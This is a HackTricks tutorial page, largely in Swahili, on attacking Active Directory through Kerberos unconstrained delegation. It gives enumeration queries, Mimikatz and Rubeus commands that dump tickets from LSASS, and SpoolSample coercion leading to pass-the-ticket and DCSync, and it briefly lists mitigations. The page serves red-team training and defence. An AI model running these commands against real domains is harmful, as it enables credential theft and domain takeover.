HackTricksUnconstrained Delegation
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Unconstrained delegation
Hii ni kipengele ambacho Msimamizi wa Domain anaweza kuweka kwa Kompyuta yoyote ndani ya domain. Kisha, kila wakati mtumiaji anapoingia kwenye Kompyuta, nakala ya TGT ya mtumiaji huyo itakuwa inatumwa ndani ya TGS inayotolewa na DC na kuhifadhiwa kwenye kumbukumbu katika LSASS. Hivyo, ikiwa una mamlaka ya Msimamizi kwenye mashine hiyo, utaweza kudondosha tiketi na kujifanya kuwa watumiaji kwenye mashine yoyote.
Hivyo ikiwa msimamizi wa domain anaingia ndani ya Kompyuta yenye kipengele cha "Unconstrained Delegation" kimewashwa, na una mamlaka ya msimamizi wa ndani kwenye mashine hiyo, utaweza kudondosha tiketi na kujifanya kuwa Msimamizi wa Domain popote (domain privesc).
Unaweza kupata vitu vya Kompyuta vyenye sifa hii kwa kuangalia ikiwa sifa ya userAccountControl ina ADS_UF_TRUSTED_FOR_DELEGATION. Unaweza kufanya hivi kwa kutumia kichujio cha LDAP cha ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, ambacho ndicho powerview hufanya:
# List unconstrained computers
## Powerview
## A DCs always appear and might be useful to attack a DC from another compromised DC from a different domain (coercing the other DC to authenticate to it)
Get-DomainComputer –Unconstrained –Properties name
Get-DomainUser -LdapFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
## Access LSASS memory
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
## Doens't access LSASS memory directly, but uses Windows APIs
Rubeus.exe dump
Rubeus.exe monitor /interval:10 [/filteruser:<username>] #Check every 10s for new TGTs
Load the ticket of Administrator (or victim user) in memory with Mimikatz or Rubeus for a Pass the Ticket.
More info: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
More information about Unconstrained delegation in ired.team.
Force Authentication
Ikiwa mshambuliaji anaweza kudukua kompyuta iliyo ruhusiwa kwa "Unconstrained Delegation", anaweza kujifanya kwa Print server ili kuingia moja kwa moja dhidi yake akihifadhi TGT katika kumbukumbu ya server.
Kisha, mshambuliaji anaweza kufanya Pass the Ticket attack to impersonate akaunti ya kompyuta ya mtumiaji Print server.
Ili kufanya print server iingie dhidi ya mashine yoyote unaweza kutumia SpoolSample:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
Ikiwa TGT inatoka kwa kiongozi wa eneo, unaweza kufanya DCSync attack na kupata hash zote kutoka kwa DC.
Maelezo zaidi kuhusu shambulio hili katika ired.team.
Pata hapa njia nyingine za kulazimisha uthibitishaji:
Force NTLM Privileged Authentication
Mitigation
- Punguza logins za DA/Admin kwa huduma maalum
- Weka "Account is sensitive and cannot be delegated" kwa akaunti zenye mamlaka.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.